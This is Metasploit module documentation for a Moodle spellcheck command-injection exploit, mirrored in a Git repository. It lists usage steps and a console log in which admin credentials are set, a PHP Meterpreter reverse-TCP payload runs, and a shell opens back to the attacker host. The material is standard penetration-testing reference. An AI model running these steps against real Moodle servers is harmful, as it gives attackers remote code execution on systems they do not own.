adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
a35be139583718bbb512ffcb3dc258b9c751e458
metasploit-gs/documentation/modules/exploit/multi/http/moodle_spellcheck_cmd_exec.md
T
h00die a35be13958 moodle 3.8.0 tested
2021-08-28 08:10:28 -04:00

2.5 KiB
Raw Blame History

Vulnerable Application

Moodle allows an authenticated administrator to define spellcheck settings via the web interface. An administrator can update the aspell path to include a command injection. This is extremely similar to CVE-2013-3630, just using a different variable.

This module was tested against Moodle version 3.10.0, and 3.8.0.

Install

Moodle provides a step by step guide to install their software here

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploits/multi/http/moodle_spellcheck_cmd_exec
  4. Do: set username [username]
  5. Do: set password [password]
  6. Do: run
  7. You should get a shell.

Options

Passowrd

Password of an administrator.

Username

Username of an administrator. Defaults to admin

Scenarios

Moodle 3.10.0 on Ubuntu 20.04

resource (moodle_spellcheck.rb)> use exploits/multi/http/moodle_spellcheck_cmd_exec
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
resource (moodle_spellcheck.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (moodle_spellcheck.rb)> set username admin
username => admin
resource (moodle_spellcheck.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_spellcheck.rb)> set targeturi /moodle-3.10.0/
targeturi => /moodle-3.10.0/
resource (moodle_spellcheck.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_spellcheck.rb)> set lhost eth0
lhost => eth0
resource (moodle_spellcheck.rb)> exploit
[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Moodle instance found, version unknown
[*] Authenticating as user: admin with login token Em5QrqGXT96iLHXKaTDoIwArMueav9Hq
[*] Updating aspell path
[*] Changing spell engine to PSpellShell
[*] Triggering payload
[*] Sending stage (39282 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:56014) at 2021-08-27 17:49:36 -0400
[*] Sleeping 5 seconds before cleanup
[*] Authenticating as user: admin with login token mPj0QEp8KtPDgm8K9PNUauMu7wdwnSFY
[*] Removing RCE from settings

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : moodle
OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux
meterpreter > exit
Reference in New Issue View Git Blame Copy Permalink